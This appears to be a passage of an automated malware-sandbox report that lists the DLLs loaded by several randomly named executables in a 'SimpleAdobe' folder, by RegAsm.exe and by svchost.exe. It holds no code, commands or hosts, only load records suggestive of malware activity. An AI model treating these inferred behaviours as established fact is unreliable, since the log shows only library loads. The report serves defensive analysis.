Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Section loaded: mscorjit.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Section loaded: mscorjit.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Section loaded: winmm.dll
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Section loaded: powrprof.dll
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Section loaded: umpdc.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: acgenral.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: winmm.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: samcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: msacm32.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: mpr.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: aclayers.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: sfc.dll
Source: C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
